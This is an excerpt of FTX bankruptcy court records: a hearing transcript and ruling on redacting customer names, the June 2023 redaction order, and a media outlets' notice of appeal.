2   need evidence, expert testimony, something to address the

3   foreign law issues in this case.

4           The debtors, the Ad Hoc Committee, the Official

5   Committee have all had the opportunity to present that

6   evidence and haven't done so.  So, we would state or restate,

7   as we have in our briefing, that we don't think foreign law

8   has any basis or influence on what the Court's obligations

9   are, with respect to access to the records that are filed in

10  this proceeding.

11          And finally, Your Honor, I just want to put this

12  in a little bit of context, because I think one of the things

13  that is most striking and, frankly, most problematic about

14  the arguments that are being made for redaction in this case

15  is the lack of any limiting principle.  I think the debtors,

16  the Official Committee, and the Ad Hoc Committee argue at

17  times, expressly for a rule that would apply in all

18  cryptocurrency bankruptcies, not just this one.

19          We've heard repeatedly, this is a cryptocurrency

20  case.  Much of Mr. Sheridan's evidence turns on, again, the

21  appealability of cryptocurrency to would-be criminals and bad

22  actors.

23          I don't think that the notion of a *per se* rule

24  that permits redaction of all creditors who are also

25  customers in the context -- or who are individuals, to be

**A0679**

1  clear -- under 107(c), but all creditors or customers under

2  the 107(b) context, a *per se* rule that would permit redaction

3  of all of the names of those creditors, customers in every

4  bankruptcy case involving cryptocurrency, I think, is deeply

5  troubling.

6            And I don't think that there's been any evidence

7  to suggest that FTX, these Chapter 11 proceedings are

8  different in some sense or in some way than other bankruptcy

9  proceedings, with respect to the arguments that are being

10 made by the parties.

11           And if you have no further questions for me, Your

12 Honor, I will conclude my argument.

13           THE COURT:  Okay.  Thank you.

14           Mr. Glueckstein, what, exactly -- I just want to

15 make sure I understand what the debtors want to have sealed

16 at this point.  Are we sealing all customers?  Are we sealing

17 customers and creditors?  Are we sealing -- what are we

18 sealing?  What are we asking to be sealed here?

19           MR. GLUECKSTEIN:  What is at issue today,

20 specifically, is the following.  Number one, the sealing of

21 all customer names, pursuant to Section 107(b).  We've

22 requested that for an additional period of 90 days.  That

23 includes all names for all purposes:  individuals and

24 institutional.  Number two, an alternative argument made

25 under Section 107(c).  That argument is requesting that the

1   Court grant the authority to grant -- to redact on a

2   permanent basis, all individual customer names.

3          If that relief is granted, that is, it obviously

4   supersedes the 90-day period with respect to the individual

5   portion under 107(b).  But they're completely separate legal

6   standards, of course, Your Honor, but it does not moot it

7   because we need the request with respect to the institutional

8   customers to preserve the entirety of the customer lists, all

9   the reasons Mr. Cofsky testified about.

10          Those are the primary relief that has been

11   requested.  If that relief is granted today, while there's a

12   lot of focus on an objection from Ms. Sarkessian, the

13   incremental relief, if you think about the entirety of the

14   picture of what's contained in the motion, the incremental

15   relief under what's being termed "the foreign law" questions,

16   would only be non-customers, individual non-customers, the

17   names of those individual non- -- the names and addresses of

18   those individual, non-customers, who would be protected by

19   the GDPR or the Japanese privacy law.  And as I represented

20   to the Court in my argument earlier, if we put all of those

21   pieces together, we believe it has a very limited set of

22   employees in those jurisdictions who are not otherwise

23   customers on the exchange.

24          That's what we're talking about.  Your Honor's

25   order in January already authorized the redaction of

1    individual addresses of customers on a permanent basis.  The

2    U.S. Trustee did not object to that.

3           So the question before the Court is dealing with

4    the names of customers, which is a contentious issue, as Your

5    Honor has heard over the last two days, and the names and

6    addresses of institutional customers that are on our customer

7    list.  And we have obviously taken the customer list question

8    and the monetization of that incrementally, as Your Honor

9    guided us in giving us the initial three-month period, and we

10   have asked for the extension for all the reasons that Mr.

11   Cofsky testified about yesterday.

12          The 107(c) issue, of course, redaction of customer

13   names -- and, again, addresses are already -- of individual

14   customers' names under 107(c), again, the addresses are

15   already permanently redacted -- that is a permanent request

16   and that is new evidence, entirely new evidence that we

17   (indiscernible) before the Court in an evidentiary way that

18   was supported my Mr. Sheridan's testimony and his

19   declaration.

20          THE COURT:  Okay.  Thank you.

21          MR. GLUECKSTEIN:  Just a few points on the

22   specific arguments made, if I could, Your Honor, in rebuttal.

23   And I think it's helpful, and I appreciate the Court's

24   question on focusing on what we're actually talking about

25   here from a relief perspective.

1          The other thing I think it's important for us to

2     step back and focus on is what are we asking?  We are not

3     asking for some *per se* rule that applies to all types of

4     cases.  We're not asking for some *per se* rule that applies to

5     all cryptocurrency cases.

6          Your Honor has been presented with evidence, with

7     respect to the facts of these cases.  Your Honor is also well

8     aware from overseeing these cases since November, of the

9     complexities that these cases present, the sheer size of

10    these cases, and the issues, many of which are novel,

11    presented by these Chapter 11 cases.

12         With respect to 107(b), Your Honor, there's no

13    carve-out in Section 107(b) for media outlets who might want

14    to report on high-profile people that might be on our top-50

15    or top-200 or top-9 million creditor list if the information

16    is protected by the statute as commercial information.

17         Mr. Cofsky did testify yesterday, despite

18    representations made today, that the top-200 creditor list on

19    our creditor list, he testified very clearly in the course of

20    doing his analysis, represents over $2 billion in claims.

21    There's a very significant value represented by that top-200

22    creditors that some subset of which the Media Objectors are

23    asking to be disclosed.

24         Mr. Cofsky also testified very, clearly, in

25    response to questioning on cross-examination, that his

**A0683**

1  opinion, as the debtors' investment banker, is that there is

2  value to the customer names, irrespective of whether the

3  customer has an account on another exchange or not.  And more

4  importantly, or as importantly, I should say, whether the

5  debtors are going to try to reorganize or restart the dot com

6  exchange or sell the customer list as either on its own or a

7  part of a set of assets is still to be determined, as

8  Mr. Cofsky testified.

9           And the premise of his testimony, based on the

10  process that's being conducted now by the debtors, is that

11  competitors, third parties have -- see value in that customer

12  list.  So they're going to put whatever value they put on

13  their list and they're going to do whatever valuation they're

14  going to do as to whether those customers or whatever

15  analysis they might be able to do about whether -- and risk-

16  adjust for those customers being on other exchanges or

17  whatever they might do, but at the end of the day,

18  Mr. Cofsky's clear testimony said his view, as the debtors'

19  investment banker, is that there's value available to these

20  estates by preserving the confidentiality of the customer

21  list, and that's the argument that we've asserted under

22  Section 107(b).

23           There was suggestion about, Well, we can solve

24  lots of problems if we just give notices or give more

25  notices.  I guess that starts to get into 107(c) issues on --

1    I'm sure Mr. Pasquale will have something to say about
2    that -- but as the Court observed during the course of the
3    hearing today, there's certainly limitations to noticing.  I
4    don't think anybody would suggest that just sending out a
5    notice to people is going to solve these problems from that
6    perspective.
7              With respect to the foreign law issues raised,
8    again, this is, you know, this is ancillary to the relief as
9    we've presented it.  Yes, we have not brought foreign law
10   experts in to interpret those statutes.  I think the term
11   which is used in argument by the Media Objectors' counsel,
12   that that relief, that incremental relief is somewhat
13   precautionary.  That is how we've presented it.
14             We don't -- until very recently, that would not
15   have been controversial in this district.  Ms. Sarkessian
16   talked about how we haven't presented a case where there has
17   been a debtor that has been sanctioned under these
18   circumstances.  Until very recently, the U.S. Trustee's
19   Office didn't object to this relief; in fact, we cite in our
20   reply papers, a string cite of cases, including cases by Your
21   Honor where this relief with names and addresses was
22   routinely granted.
23             And we understand, and we understand that there
24   are issues presented and issues that courts have begun to
25   grapple with respect to whether some of these foreign

 1   statutes would take precedence over U.S. Bankruptcy law

 2   issues.  I don't think, though, Your Honor, under the

 3   circumstances, that that precludes this Court in the

 4   context -- again, everything that we're doing here -- if Your

 5   Honor agrees with the Movants that we are going to be

 6   redacting and it's appropriate under the facts of this case

 7   to redact the customer lists, to redact the customer names,

 8   we submit that the risk that is presented by the plain

 9   language of the statute, that we don't need an expert to

10   testify about, is enough to grant that incremental relief.

11   But it is certainly very much ancillary to the relief we're

12   asking for today.

13            And, finally, Your Honor, just in response,

14   because there were suggestions made or intimations made by

15   Ms. Sarkessian, the debtors have complied with the Court's

16   January order, to the letter of that order.  So, we have not

17   made redactions in Japan or any other law that's not covered

18   by that order.  And so, I just wanted to be clear about that,

19   we have -- obviously, that order -- there was an evidentiary

20   hearing to get that order put into place.  There were

21   negotiations over the language in that order, including with

22   the U.S. Trustee's Office, and the Court entered that order

23   in January and that order remains in place.  That was a final

24   order on our first day motion and the motion we're asking for

25   today is, obviously, incremental to that.

1          THE COURT:  Address Ms. Sarkessian's argument that

2    the debtors have redacted the names from other pleadings of

3    customers.

4          MR. GLUECKSTEIN:  We have redacted names of

5    customers from --

6          THE COURT:  She raised the contract rejection

7    motion, the names were redacted in that because the debtors

8    said, Well, they were customers.

9          MR. GLUECKSTEIN:  Well, we have redacted customer

10   names.  I don't know if that was in the motion itself.  I

11   think this mainly occurs in things like affidavits of service

12   and the like.  But we have redacted customer names wherever

13   they have appeared.  We have done that after consultation

14   with the Creditors Committee.

15          We do, you know, it has been our position that

16   customer names should be redacted.  That has been done or

17   that's been authorized, and so we have -- in order to assure

18   that customer names are not in the public domain on the

19   docket of this case in an involuntary way, we have redacted

20   those names wherever they appeared.

21          THE COURT:  Well, here's -- I have a problem with

22   that one.  I have a problem with the issue that if, in fact,

23   there was a motion to reject contracts that included the

24   names of the counterparties to those contracts and some of

25   the names of those counterparties were redacted because

1   they're also a customer of the debtor, that's problematic

2   because no one would know that they were a customer of the

3   debtor unless you redacted it.  They wouldn't know it because

4   they're already redacted from the customer list.  So you

5   can't redact a name from a motion when they're a counterparty

6   to a contract.  I'm just using that as an example.

7           I think one of the other ones she used was

8   charitable donations, parties who receive charitable

9   donations.  You can't just redact their names because they

10  also happen to be a customer because, again, nobody would

11  know that they were a customer.

12          MR. GLUECKSTEIN:  So, I don't recall the contract

13  rejection motion that Ms. Sarkessian is referring to.  I

14  don't recall offhand whether that was in the -- is the

15  scenario that Your Honor is positing.

16          This issue arises mostly in the context, as I

17  said, of things like affidavits of service, where we're

18  serving people who are in capacities where they might also be

19  customers, things like that.

20          But I understand Your Honor's point and we

21  obviously will take -- you know, we will obviously proceed

22  forward with any guardrails that Your Honor imposes upon us.

23          THE COURT:  All right.  Thank you.

24          MR. GLUECKSTEIN:  Thank you.

25          MR. PASQUALE:  Good afternoon, Your Honor.  Ken

1    Pasqual for the Committee.  Just very quickly.

2              I think I've addressed in my prior comments and in

3    the Committee's pleadings, most of the points that were

4    raised in opposition to the motion, but just two things if I

5    may?  First, with respect to the notices that might go out,

6    as Ms. Townsend said, "after the fact," we shouldn't have to

7    deal with "after the fact" attempts to correct information

8    when it is disclosed.  That's the genie example I mentioned

9    earlier.  Once the names are out, no matter how much warning

10   we give people, the harm can be done, as Mr. Sheridan

11   testified.

12             Counsel also argued that customers accepted the

13   risks attached to an investment in cryptocurrency.  Yes, as

14   an investment in cryptocurrency.  They did not accept the

15   risk of an involuntary -- excuse me -- of involuntary

16   disclosure of their names in a bankruptcy case that they

17   didn't expect to happen and certainly didn't accept the risks

18   that such a disclosure would expose them too, again, as

19   Mr. Sheridan testified.

20             That's all I have, Your Honor.  Thank you.

21             THE COURT:  All right.  Thank you.

22             MS. SARKESSIAN:  Your Honor, could I have a moment

23   to speak to counsel for the Ad Hoc Committee before he does

24   his argument?

25             THE COURT:  Okay.  If it will resolve the issue.

1          (Pause)

2              MR. WENDER:  So, Your Honor, for the record, David

3     Wender on behalf of the Ad Hoc Committee.

4              And just to explain the discussion before, there

5     was a little bit of back-and-forth with Ms. Sarkessian and

6     myself as to whether the language came from in our pleading.

7     We referenced the transcript.  That actually was incorrect.

8     It's in the order where we got that quoted language from.

9              Ms. Sarkessian rightly pointed out, basically, it

10    wasn't in the actual transcript.  There's history.  I was not

11    involved in that case, but we got the language from the

12    order.  I don't think that's essential for today, but I just

13    wanted to clarify that it was coming from different places.

14    Neither one of us were attempting to mislead the Court.

15             Now, Your Honor, you asked Mr. Glueckstein what he

16    wanted and since we also have our separate motion, I wanted

17    to answer that question on behalf of the Ad Hoc Committee,

18    because our motion was filed -- first of all, we joined the

19    relief requested in the joint motion, because we think it's

20    appropriate to protect customers.

21             With respect to the Ad Hoc Committee's motion, it

22    was to protect the disclosures in the 2019 statement to

23    redact customer names and addresses.  Ad Hoc Committee

24    members are non-U.S. customers and that information is sought

25    to be protected.

1          The reason why we seek it both under 107(b)

2     and 107(c) in relying on the evidentiary record is a little

3     different because in 2019, and if you looked at the actual

4     redacted 2019 that's on file here, it lists redacted form

5     name, the redacted form address, but it also discloses their

6     economic interests, which is required under 2019, including

7     in certain instances, where they had records of actual,

8     traceable cryptocurrency.

9          And so, and the reason why I wanted to focus on

10    that and talk about 107(c), again, under 107(b), the debtors

11    in the joint motion say they want to protect those customers

12    because they might be able to obtain value from it.

13         But in 107(c), and people's focused on, well, it

14    only protects individuals, and that's what it references.

15    But if you actually look at the language in 107(c), is it

16    protects the individual if the disclosure would create undue

17    risk to individual or the individual's property.

18         And this, the property that we're talking about

19    is, again, it's the investments of these entities and some of

20    them it's, Oh, there's no evidence, but I'll just state it or

21    single-person LLCs, but their property, we could put at risk.

22    And if you look at the individual and if you look, again,

23    at 107(c), it references 102(d)(7) of Title 18 -- or

24    sorry -- 102(d) of Title 18.

25         And Subsection 7 of that says, any name -- and

1    we're talking about the information protected -- any name or

2    number that may be used alone or in conjunction with other

3    information to identify a specific individual.  And by having

4    this information, you heard the testimony about the ability

5    to trace on the blockchain and the dark web who owns it and

6    who's involved, we think 107 would apply.

7         Whether it's to everybody, maybe since the joint

8    motion isn't seeking that relief, but we think relative, at

9    least to the 2019 statement, that that would apply to

10   protect, so we don't have to come back in 90 days to re-seek.

11        Now, again, we said this in our pleadings, without

12   prejudice to the U.S. Trustee to come and seek disclosure;

13   that reservation is always there for her.

14        So what the Ad Hoc Committee is seeking for is an

15   order clarifying that when we file our 2019 statements, the

16   ones that have already been filed, that we may redact the

17   names and addresses of our individuals -- of our customers

18   that are both, individuals and non-individual members of the

19   Ad Hoc Committee.

20        THE COURT:  What does the Ad Hoc Committee intend

21   to do?

22        MR. PASQUALE:  We are hopeful to be engaging in

23   the process there.  We have attempted, at one point earlier

24   in the case, we've talked about an official committee that

25   didn't go anywhere.  We're trying, hopefully -- and it's

1    early stages -- to hopefully, although, not in a

2    representative capacity, because we're not, but ensure that,

3    and although there is an unsecured committee, we think that

4    there are certain aspects that the Unsecured Creditors

5    Committee cannot fully represent non-U.S. customers, and so

6    we are hopeful that we will be involved in the process.  So

7    what extent?  We will see.

8              To hope that there's a plan that we can, as a

9    voice and someone who can speak to non-U.S. customers can

10   say, we think is in the best interests of all non-U.S.

11   customers, as well, and support that.

12             THE COURT:  All right.  Thank you.

13             MR. PASQUALE:  Thank you, Your Honor.

14             THE COURT:  All right.  Well, here's what I'm

15   going to do.  With regard to the redaction of customer names

16   under 107(b), I think the evidence presented was

17   uncontroverted that customer identification has value.  It

18   has value to the debtors' estates.  And under 107(b), the

19   customer names constitute a trade secret, as I said, back in

20   January.  And as a result, those names can continue to be

21   redacted for an additional 90 days while the debtors continue

22   to seek how they're going to come out of these bankruptcies;

23   if they're going to sell the assets, including the customer

24   lists, or if they're going to reorganize, in which case,

25   they're going to want the customer lists.

1          The fact that the customers might not be exclusive

2    customers, and I don't -- some of them might be.  Some of

3    them might not.  I mean, we've got nine million customers;

4    that's a lot of people.  I have no way to parse that.  I

5    don't think anybody has a way to parse that out.

6          So the best way to deal with the issue is to say

7    that all of the customer names continue to be redacted.

8          The 107(c) issue, Mr. Sheridan introduced very

9    compelling testimony; again, uncontroverted testimony, about

10   how customers can be identified just by a name.  It's

11   something that happens all the time in our society today,

12   given the access to, not just the types of information we all

13   have access to -- Google, Twitter, et cetera -- but the dark

14   web, where there's all kinds of information about individuals

15   that can be found with just a name.

16         And he testified, again, very compellingly, that

17   if they have a name and they are an FTX customer, they can be

18   targeted, and that is what we need to protect here.  It's the

19   customers that are the most important issue here.  I want to

20   make sure that they are protected and they don't fall victim

21   to any types of scams that might be happening out there.

22         So I'm going to grant the motion, as well, to

23   redact customer names under 107(c) for individuals, on a

24   permanent basis.  It obviously does not cover companies or

25   entities.

**A0694**

1        On the foreign law issue, I simply have no

2    evidence to support it.  I know as Mr. Glueckstein pointed

3    out, I've entered orders in the past, but it's always been

4    when there was no objection.  But there's an objection now

5    and it's the right of the U.S. Trustee to make that

6    objection, so I needed to have something to show that there

7    would be harm to these individuals who might be located in

8    the U.K., the European Union, or Japan, that would result in

9    some harm to them, and I have nothing.

10        The statute, itself, at least the GDPR, is not

11    exactly clear to me.  I mean, it says they have to be

12    protected, but I really -- as I said in January, I would have

13    liked to have someone come and testify and tell me that if

14    you order the release of these names, the debtors are subject

15    to subject to some kind of sanctions.

16        I find it hard to believe that a court in the U.K.

17    or the European Union or in Japan, would say, I'm going to

18    sanction the debtors for releasing names when they were

19    ordered to do so by a Court of the United States.  That just

20    doesn't seem to be a potential possibility.  So I'm going to

21    deny the motion to that extent.

22        On the 2019 issue for the Ad Hoc Committee, in is

23    a horse of a different color.  You have an Ad Hoc Committee

24    who wants to participate actively in the case.  As I said

25    with the members of the Unsecured Creditors Committee, if you

1   want to be a member of the Unsecured Creditors Committee, you

2   have to identify yourself because people have a right to know

3   who they're litigating against and they can't do that if they

4   don't know who they are.

5            So I don't think that they are protected

6   under 107(c) or (b), and those names have to be disclosed if

7   they're going to participate.  Now, I understand that you may

8   have had some of your clients sign up for this, with the

9   expectation that I would keep that information sealed, so I'm

10  going to give you an opportunity to go back to your clients

11  and say, The judge said we can't seal these names and

12  information, so we're going to have to disclose it.  Do you

13  still want to be a member of the Committee so that they can

14  have a chance to withdraw if they want to, all right.  So

15  that motion is denied.

16           Any questions about that one?

17           Ms. Sarkessian?

18           MS. SARKESSIAN:  Yes, Your Honor.  I do have a few

19  questions.  Thank you, Your Honor.

20           Again, for the record, Juliet Sarkessian on behalf

21  of the U.S. Trustee.

22           How about redaction of the names of the insiders

23  who happen to be customers, is your ruling -- does your

24  ruling allow them to continue to redact the name of the

25  insiders on statement of financial affairs and other

1  documents?

2          THE COURT:  For now, yes.

3          MS. SARKESSIAN:  Okay, thank you.

4          THE COURT:  They're subject to the 90-day rule.

5          MS. SARKESSIAN:  Even if you cannot determine from

6  the document that they are, in fact, customers?

7          THE COURT:  Well, I mean, the debtor can only

8  redact them if they are a customer, so we're going to have

9  to -- if the debtors are redacting names of insiders who are

10  not customers, that would be a problem.  But I didn't hear

11  they were doing that.

12          MS. SARKESSIAN:  No, Your Honor.  I'm sorry, I

13  misspoke.

14          What I mean is if you look at the document, from

15  the context of it -- okay, here, transfers to insiders --

16  from the context, there's no particular reason to believe

17  that anybody is a customer or not a customer.

18          THE COURT:  Well, that kind of goes back to what I

19  was talking to Mr. Glueckstein about with regard to the

20  charitable donations --

21          MS. SARKESSIAN:  Right.

22          THE COURT:  -- and the motion for assumption or

23  rejection of the contracts.

24          You can't redact a name in some other motion where

25  they are a party to that motion, simply because they're also

1  a customer, because, as I said, nobody would know that

2  they're a customer.  I agree with you on that.

3           MS. SARKESSIAN:  So, Your Honor, if, in the

4  statement of financial affairs, when you look at the

5  transfers to insiders, there's nothing to indicate.  There's

6  no way to know if any of those insiders are customers.

7           So given that fact, is Your Honor ruling that in

8  you cannot tell looking at the statement of financial affairs

9  that these insiders happen to be customers, that they would

10  have to disclose those names?

11          THE COURT:  Yes, they do.

12          MS. SARKESSIAN:  Thank you, Your Honor.

13          And just a final question, Your Honor.  On the

14  redaction of customers who are individuals, their names, is

15  that on a permanent -- Your Honor has it on a permanent

16  basis?

17          THE COURT:  Under 107(c), yes.

18          MS. SARKESSIAN:  Okay.  Thank you, Your Honor.

19          THE COURT:  Okay.

20          MR. WENDER:  Your Honor, really quick, and I

21  apologize.  David Wender, on behalf of the Ad Hoc Committee.

22          In filing an unredacted 2019, is it just the names

23  that have to be unredacted or the addresses, as well?

24  Because under 2019, we have to disclose it.  It's -- provides

25  for the name, the address, and disclose what economic

<pre>
 1                      CERTIFICATION
 2          We certify that the foregoing is a correct
 3  transcript from the electronic sound recording of the
 4  proceedings in the above-entitled matter to the best of our
 5  knowledge and ability.
 6
 7  /s/ William J. Garling                 June 12, 2023
 8  William J. Garling, CET-543
 9  Certified Court Transcriptionist
10  For Reliable
11
12  /s/ Tracey J. Williams                 June 12, 2023
13  Tracey J. Williams, CET-914
14  Certified Court Transcriptionist
15  For Reliable
16
17  /s/ Coleen Rand                        June 12, 2023
18  Coleen Rand, CET-341
19  Certified Court Transcriptionist
20  For Reliable
21
22
23
24
25
</pre>

# IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Jointly Administered) |
| | **Ref. Nos. 545, 1324 & 1641** |

## ORDER AUTHORIZING THE MOVANTS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS

Upon the joint motion (the "Motion")[2] of FTX Trading Ltd. and its affiliated debtors and debtors-in-possession (collectively, the "Debtors") and the Official Committee of Unsecured Creditors appointed in the above-captioned cases (the "Committee" and, together with the Debtors, the "Movants"), for entry of an order (this "Order") authorizing the Movants to redact (a) the names, addresses and e-mail addresses of the Debtors' customers from any filings with the Court or made publicly available in these Chapter 11 Cases and (b) the names, addresses and e-mail addresses of any creditors or equity holders who are natural persons and who are protected by the GDPR or Japan data privacy laws from any filings with the Court or made publicly available in these Chapter 11 Cases; and this Court having jurisdiction to consider the Motion pursuant to 28 U.S.C. §§ 157 and 1334 and the *Amended Standing Order of Reference* from the United States District Court for the District of Delaware, dated February 29, 2012; and this Court being able to

---

[1] The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification number are 3288 and 4063 respectively. Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein. A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX. The principal place of business of Debtor Emergent Fidelity Technologies Ltd is Unit 3B, Bryson's Commercial Complex, Friars Hill Road, St. John's, Antigua and Barbuda.

[2] Capitalized terms not otherwise defined herein are to be given the meanings ascribed to them in the Motion.

{1368.002-W0070617.}

issue a final order consistent with Article III of the United States Constitution; and venue of these Chapter 11 Cases and the Motion in this district being proper pursuant to 28 U.S.C. §§ 1408 and 1409; and this matter being a core proceeding pursuant to 28 U.S.C. § 157(b); and this Court having found that proper and adequate notice of the Motion and the relief requested therein has been provided in accordance with the Bankruptcy Rules and the Local Rules, and that, except as otherwise ordered herein, no other or further notice is necessary; and a hearing having been held to consider the relief requested in the Motion and upon the record of the hearing and all of the proceedings had before this Court; and this Court having found and determined that the relief set forth in this Order is in the best interests of the Debtors and their estates; and that the legal and factual bases set forth in the Motion establish just cause for the relief granted herein; and after due deliberation and sufficient cause appearing therefor;

IT IS HEREBY ORDERED THAT:

1. The Motion is GRANTED in part, and DENIED in part, as set forth herein, for the reasons set forth on the record at the hearing on the Motion on June 9, 2023.

2. The Debtors and the Committee are each authorized, pursuant to section 107(b)(1) of the Bankruptcy Code, to redact the names, addresses and e-mail addresses of all of the Debtors' customers from all filings with the Court or made publicly available in these Chapter 11 Cases; *provided*, *however*, that the authorization to redact the names of all customers, and to redact the names, addresses and e-mail addresses of customers who are not natural persons, is only until the date that is 90 days from the date of the entry of this Order (such date, the "Extended Redaction Deadline"); *provided, further* that the time period in which the Debtors and the Committee are authorized to redact the names of customers who are natural persons is governed by paragraph 4 of this Order; *provided*, *further* that the authorization to redact the names of

**A0701**

customers, whether they are natural persons or entities, and the addresses of customers who are not natural persons, is limited to those documents in which disclosure would indicate the status of such person or entity as a customer.

3.      The right of the Debtors, the Committee, and all other parties-in-interest to seek an extension of the Extended Redaction Deadline, or to request authorization to redact any personal information of customers, creditors or equity holders on any other grounds, are reserved.

4.      The Debtors and the Committee are each authorized, pursuant to section 107(c)(1) of the Bankruptcy Code, to permanently redact the names of all customers who are natural persons from all filings with the Court or made publicly available in these Chapter 11 Cases in which disclosure would indicate such person's status as a customer.

5.      The Motion is denied with respect to the Movants' request to redact the names, addresses and e-mail addresses of any creditors or equity holders who are natural persons from any filings with the Court or made publicly available in these Chapter 11 Cases on the basis that such persons are protected by the GDPR or Japan data privacy law.

6.      For the avoidance of doubt, the Debtors and the Committee shall each file unredacted versions of any papers redacted pursuant to this Order under seal with the Court in accordance with the Local Rules.

7.      Notwithstanding anything to the contrary in the order relating to the retention of a claims agent, or any Local Rules or Bankruptcy Rules, the Claims and Noticing Agent is authorized to (a) suppress from the Claims Register (i) the names, addresses and e-mail addresses of the Debtors' customers until the Extended Redaction Deadline, and (ii) the names of the Debtors' customers who are natural persons; (b) file affidavits of services redacting (i) the names, addresses and e-mail addresses of the Debtors' customers until the Extended Redaction

Deadline, and (ii) the names of the Debtors' customers who are natural persons; and (c) withhold publication of proofs of claim filed by customers in accordance with the terms of this Order, *provided* that the Claims and Noticing Agent shall serve the Debtors' customers, creditors and equity holders at their actual addresses and e-mail addresses.

8. The Debtors and the Committee shall each provide unredacted copies of any filings redacted pursuant to this Order to (a) the U.S. Trustee, counsel to the Committee, the Debtors, and any trustee or examiner that is appointed in these Chapter 11 Cases, except that unredacted copies of affidavits of service shall be provided only upon request; (b) upon request to the U.S. Department of Justice, counsel to the U.S. Securities and Exchange Commission, counsel to state governmental agencies of the State of Texas; and (c) upon further order of the Court, any other party.

9. Upon request of a party-in-interest, the Court may, upon a showing of good cause, release some or all of the information that is being redacted pursuant to the authority granted by this Order. All parties' rights in this regard are reserved.

10. To the extent a party-in-interest files a document on the docket in these Chapter 11 Cases that is required to be served on creditors whose information is under seal pursuant to this Order, such party-in-interest should contact counsel for the Debtors who shall work in good faith, with the assistance of their Claims and Noticing Agent, to effectuate the service on such party's behalf.

11. Nothing in this Order prohibits any customer, creditor or equity holder from voluntarily identifying itself in connection with these Chapter 11 Cases, or voluntarily disclosing any of their contact information. Nothing in this Order exempts any customer, creditor or equity holder from compliance with Bankruptcy Rule 2019.

12.     Nothing in this Order alters the Original Order's authorization of the Debtors to redact addresses and e-mail addresses of the Debtors' customers, creditors and equity holders who are natural persons.

13.     Nothing in this Order alters the Original Order's requirement that the name of any creditor who was appointed by the U.S. Trustee to the Official Committee of Unsecured Creditors, and the address, e-mail address or phone numbers of any creditor who is not natural persons and was appointed by the U.S. Trustee to the Official Committee of Unsecured Creditors not be redacted from the Debtors' refiled Consolidated Lists of Top 50 Creditors.

14.     Each of the Movants are authorized and empowered to execute and deliver such documents, and to take and perform all actions necessary to implement and effectuate the relief granted in this Order.

15.     This Court shall retain jurisdiction with respect to any matters, claims, rights or disputes arising from or related to the Motion or the implementation of this Order.

**Dated: June 15th, 2023**
**Wilmington, Delaware**

**JOHN T. DORSEY**
**UNITED STATES BANKRUPTCY JUDGE**

**A0704**

IN THE UNITED STATES BANKRUPTCY COURT
FOR THE DISTRICT OF DELAWARE

|  |  |
|---|---|
| In re<br>FTX Trading Ltd., et al.,<br>*Debtors*.[1] | Chapter 11<br>Case No. 22-11068-JTD<br>(Jointly Administered) |

## NOTICE OF APPEAL AND STATEMENT OF ELECTION

**Part 1: Identify the appellant(s)**

1. Name(s) of appellant(s):

   Bloomberg L.P.; Dow Jones & Company, Inc.; The New York Times Company; and The Financial Times Ltd.

2. Position of appellant(s) in the adversary proceeding or bankruptcy case that is the subject of this appeal:

   For appeals in an adversary proceeding.
   ❑ Plaintiff
   ❑ Defendant
   X Other (describe):  Media Intervenors

   For appeals in a bankruptcy case and not in an adversary proceeding.
   ❑ Debtor
   ❑ Creditor
   ❑ Trustee
   ❑ Other (describe)  _____

**Part 2:  Identify the subject of this appeal**

1. Describe the judgment, order, or decree appealed from: June 15, 2023 order of the U.S. Bankruptcy Court for the District of Delaware, granting, in part, the motion of FTX Trading Ltd. and its affiliated debtors and debtors-in-possession (collectively, the "Debtors") and the Official Committee of Unsecured Creditors over the objections of Media Intervenors-Appellants and the U.S. Trustee, and authorizing the redaction of the names, addresses and e-mail addresses of Debtors' customers from any filings with the Court for a period of at least 90-days pursuant to Bankruptcy Code Section 107(b)(1); and (b) the permanent redaction of the names of Debtors' customers who are natural persons from all

---

[1] FTX Trading Ltd.'s and Alameda Research LLC's tax identification numbers are 3288 and 4063, respectively.  Due to the large number of debtor entities in these Chapter 11 cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein.  A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

1

**A0705**

filings with the Court pursuant to Bankruptcy Code Section 107(c)(1).  *See* Order Author-
izing the Movants to Redact or Withhold Certain Confidential Information of Customers
and Personal Information of Individuals, D.I. 1643. A true and correct copy of the June
15, 2023 order is attached hereto as Exhibit A.

2.  State the date on which the judgment, order, or decree was entered:  June 15, 2023.

**Part 3: Identify the other parties to the appeal**

List the names of all parties to the judgment, order, or decree appealed from and the names, ad-
dresses, and telephone numbers of their attorneys (attach additional pages if necessary):

Debtors and Debtors-in-Possession:
    Adam G. Landis, Esquire
    LANDIS RATH & COBB, LLP
    919 Market Street
    Suite 1800
    Wilmington, Delaware 19801
    302-467-4400

    Brian D. Glueckstein, Esquire
    SULLIVAN & CROMWELL, LLP
    125 Broad Street
    New York, New York 10004
    212-558-4000

US Trustee:
    Juliet M. Sarkessian, Esquire
    OFFICE OF THE UNITED STATES TRUSTEE
    UNITED STATES DEPARTMENT OF JUSTICE
    844 King Street
    Suite 2207, Lockbox 35
    Wilmington, Delaware 19801
    302-573-6491

Ad Hoc Committee of Non-US Customers of FTX.com
    David A. Wender, Esquire
    EVERSHEDS SUTHERLAND (US), LLP
    999 Peachtree Street, NE
    Suite 2300
    Atlanta, Georgia 30309
    404-853-8175

Official Committee of Unsecured Creditors:
    Kenneth Pasquale, Esquire

2

**A0706**

Isaac Sasson, Esquire
PAUL HASTINGS, LLP
200 Park Avenue
New York, New York 10166
(212) 318-6000

Media Intervenors:

    David L. Finger
    FINGER & SLANINA, LLC
    One Commerce Center
    1201 N. Orange St., 7th fl.
    Wilmington, DE 19801
    302.573.2525

    KatieLynn B. Townsend, Esquire (pro hac vice)
    REPORTERS COMMITTEE FOR FREEDOM OF
     THE PRESS
    1156 15th Street, NW
    Suite 1020
    Washington, DC 20005
    202.795.9300

A list of all parties and attorneys that have entered appearances in this matter according to PACER is attached hereto as Exhibit B and incorporated by reference herein.

                Respectfully submitted,

